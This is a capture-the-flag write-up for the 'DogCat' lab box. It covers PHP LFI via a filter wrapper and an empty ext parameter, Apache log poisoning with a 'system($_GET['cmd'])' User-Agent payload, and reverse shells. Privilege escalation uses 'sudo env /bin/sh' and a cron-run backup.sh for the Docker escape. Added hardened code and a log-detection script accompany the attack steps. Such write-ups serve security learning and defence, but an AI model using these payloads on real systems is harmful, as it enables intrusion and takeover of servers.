DogCat
Enumerating Parameters - Bypass PHP Filter using Wrapper - Exploiting LFI to get RCE - Env PrivEsc - Docker Escape
Starting off with an nmap scan to find out which ports are open
# Nmap 7.93 scan initiated Thu Feb 2 13:32:37 2023 as: nmap -sCV -A -vv -p 22,80 -oN nmap.log 10.10.27.48
Nmap scan report for 10.10.27.48
Host is up, received conn-refused (0.27s latency).
Scanned at 2023-02-02 13:32:43 IST for 22s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2431192ab1971a044e2c36ac840a7587 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCeKBugyQF6HXEU3mbcoDHQrassdoNtJToZ9jaNj4Sj9MrWISOmr0qkxNx2sHPxz89dR0ilnjCyT3YgcI5rtcwGT9RtSwlxcol5KuDveQGO8iYDgC/tjYYC9kefS1ymnbm0I4foYZh9S+erXAaXMO2Iac6nYk8jtkS2hg+vAx+7+5i4fiaLovQSYLd1R2Mu0DLnUIP7jJ1645aqYMnXxp/bi30SpJCchHeMx7zsBJpAMfpY9SYyz4jcgCGhEygvZ0jWJ+qx76/kaujl4IMZXarWAqchYufg57Hqb7KJE216q4MUUSHou1TPhJjVqk92a9rMUU2VZHJhERfMxFHVwn3H
| 256 213d461893aaf9e7c9b54c0f160b71e1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBouHlbsFayrqWaldHlTkZkkyVCu3jXPO1lT3oWtx/6dINbYBv0MTdTAMgXKtg6M/CVQGfjQqFS2l2wwj/4rT0s=
| 256 c1fb7d732b574a8bdcd76f49bb3bd020 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIfp73VYZTWg6dtrDGS/d5NoJjoc4q0Fi0Gsg3Dl+M3I
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 2 13:33:05 2023 -- 1 IP address (1 host up) scanned in 28.30 seconds
Seems like the /?view PHP query parameter displays some .jpg files; every time you request a dog image the backend sends a different picture, which means it already has a few pictures stored.

When we append a slash after the dog, we get an error. The backend basically uses the include function in PHP, which pulls the named file into the page, so it is purely vulnerable to LFI-style attacks! It even appends a .php extension after the slash, hmm, fishy right? Why not simply check the index.php which is one directory above: /?view=dog/../index (did not add the .php, as it is appended automatically)

Still no clue, it returns the same error, so why don't we try a PHP wrapper to base64-encode our desired output? When we try this, we get the desired index.php in base64 form.

Decoding the above gives us the source code, which shows how the filtering works!
<?php
// Substring check: true if $substr occurs anywhere inside $str
function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}
// The extension comes from the ?ext= parameter when present, otherwise ".php"
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
    // Only checks that "dog" or "cat" appears somewhere in the value
    if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
        echo 'Here you go!';
        // User-controlled path and extension reach include(): this is the LFI
        include $_GET['view'] . $ext;
    } else {
        echo 'Sorry, only dogs or cats are allowed.';
    }
}
?>
We can see that we have control over the $ext variable, which is responsible for appending the .php after the filename, and most importantly the /?view value should start with either dog or cat.
So in order to bypass this, we can include the $ext variable in our URL and give it an empty value:
http://example.com/?view=dog/../index&ext=
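As an added example (this is not the DogCat application's code), here is how the same handler can be written so that neither trick on this page works: an exact allow-list of view names replaces the containsStr substring check, the .php extension is fixed server-side instead of being read from ?ext=, and a realpath() containment check rejects anything that resolves outside the script's directory. The filenames dog.php and cat.php and the use of __DIR__ as the base directory are assumptions.

```php
<?php
// Added example, not the DogCat application's code: a hardened version of the
// view handler shown on the page. Assumes the two views are served from dog.php
// and cat.php next to this script (filenames and base directory are assumptions).
declare(strict_types=1);

// Exact allow-list of view names. The original used a substring check
// (containsStr), which "dog/../index" satisfies; an exact match does not.
const ALLOWED_VIEWS = ['dog', 'cat'];

/**
 * Map a user-supplied view name to an absolute file path inside $baseDir,
 * or return null if it is not allowed. The ".php" extension is fixed here,
 * so there is no ?ext= parameter for the client to blank out.
 */
function resolveView(string $view, string $baseDir): ?string
{
    if (!in_array($view, ALLOWED_VIEWS, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $view . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    // Second line of defence: the resolved file must sit under the base directory.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Reject non-string input (e.g. ?view[]=dog) before it reaches the allow-list.
$view = (isset($_GET['view']) && is_string($_GET['view'])) ? $_GET['view'] : '';
$path = resolveView($view, __DIR__);

if ($path === null) {
    http_response_code(400);
    echo 'Sorry, only dogs or cats are allowed.';
    exit;
}

echo 'Here you go!';
include $path;
```

With an exact allow-list the realpath() check is belt and braces, but it is cheap and keeps the handler safe if the list later grows to include anything derived from user input. Dropping the $ext parameter entirely, rather than validating it, is what removes the empty-extension trick.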
Using the above trick we can dump the /etc/passwd file: no bash-session users, only www-data is available.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Now let's abuse the LFI. Checking /var/log/apache2/access.log, we find our User-Agent being logged with every request, which confirms we can perform an Apache log poisoning attack and leverage it into RCE!

In order to exploit the log poisoning attack, we first have to insert the PHP command payload below into our User-Agent:
<?php system($_GET['cmd']);?>
Then insert a PHP exec reverse shell from https://revshells.com into the cmd parameter and get a reverse shell!
http://example.com/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd={ PHP SHELL }
User-Agent = <?php system($_GET['cmd']);?>
NOTE - Do not make any mistake while inserting the PHP payload in the User-Agent: once a broken payload lands in the log file, then no matter what you do, you will not get the desired result and you won't even be able to view access.log any more.
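From the defender's side, the whole chain above leaves three distinct traces in the very log that was poisoned: a PHP open tag in a client-controlled field, directory traversal in the request line, and the empty ext= parameter. The following script is an added example (not part of the original writeup) that scans an Apache combined-format access log for those three signatures; the sample log lines are constructed for this example, and the ext= rule is specific to this application's bypass.

```php
<?php
// Added example, not part of the original writeup: scan an Apache "combined"
// access log for the traces the log-poisoning chain leaves behind.
// The sample lines at the bottom are constructed for this example.
declare(strict_types=1);

// Apache combined LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
const COMBINED_RE = '/^(?<host>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<request>[^"]*)" (?<status>\d{3}) \S+ "(?<referer>[^"]*)" "(?<ua>[^"]*)"$/';

// Rule 1: a PHP open tag in any client-controlled field (the poisoning step)
const PHP_TAG_RE = '/<\?(?:php\b|=)/i';
// Rule 2: directory traversal in the request line (the LFI step)
const TRAVERSAL_RE = '/\.\.(?:\/|%2f)/i';
// Rule 3: an empty ext= parameter (this application's extension-bypass trick)
const EMPTY_EXT_RE = '/[?&]ext=(?=[& ]|$)/';

function parseCombinedLine(string $line): ?array
{
    if (!preg_match(COMBINED_RE, rtrim($line, "\r\n"), $m)) {
        return null; // not combined format; a real deployment would count these too
    }
    return [
        'host' => $m['host'], 'time' => $m['time'], 'request' => $m['request'],
        'status' => (int) $m['status'], 'referer' => $m['referer'], 'ua' => $m['ua'],
    ];
}

/** Return one finding per rule hit: line number, client host, rule and field. */
function findSuspiciousEntries(iterable $lines): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        $entry = parseCombinedLine($line);
        if ($entry === null) {
            continue;
        }
        $add = function (string $rule, string $field) use (&$findings, $i, $entry): void {
            $findings[] = ['line' => $i + 1, 'host' => $entry['host'], 'rule' => $rule, 'field' => $field];
        };
        foreach (['ua', 'referer', 'request'] as $field) {
            if (preg_match(PHP_TAG_RE, $entry[$field])) {
                $add('php-tag', $field);
            }
        }
        if (preg_match(TRAVERSAL_RE, $entry['request'])) {
            $add('traversal', 'request');
        }
        if (preg_match(EMPTY_EXT_RE, $entry['request'])) {
            $add('empty-ext', 'request');
        }
    }
    return $findings;
}

// Constructed sample: one benign hit, the poisoning request, and the trigger request.
$sample = [
    '10.0.0.5 - - [02/Feb/2023:13:40:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [02/Feb/2023:13:41:17 +0000] "GET /?view=dog/../index&ext= HTTP/1.1" 200 1201 "-" "<?php system($_GET[\'cmd\']);?>"',
    '10.0.0.9 - - [02/Feb/2023:13:41:20 +0000] "GET /?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd=id HTTP/1.1" 200 9000 "-" "curl/7.88.1"',
];

// Usage: php detect.php [/path/to/access.log]; falls back to the sample above.
$lines = ($argc > 1) ? file($argv[1]) : $sample;
foreach (findSuspiciousEntries($lines) as $f) {
    printf("line %d from %s: %s in %s\n", $f['line'], $f['host'], $f['rule'], $f['field']);
}
```

On the sample input this reports php-tag, traversal and empty-ext for line 2 and traversal plus empty-ext for line 3, while the ordinary request on line 1 produces nothing. The rules are deliberately simple; the point is that the poisoning step is visible before the trigger request arrives, so alerting on a PHP tag in the User-Agent field gives a defender a window to act.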
- Grab the first flag, then go one directory back and cat out the second flag
Privilege Escalation
Let's start our enumeration by reading the sudo permissions for the current user

GTFOBins to the rescue!
sudo env /bin/sh
Enumerating the box further suggests that there might be a Docker container and that flag4 is hidden there; enumerating the /opt directory gives us a writable file called backup.sh.
It seems that this .sh file is run as a cron job, so let's just append our reverse shell to it and get r00t.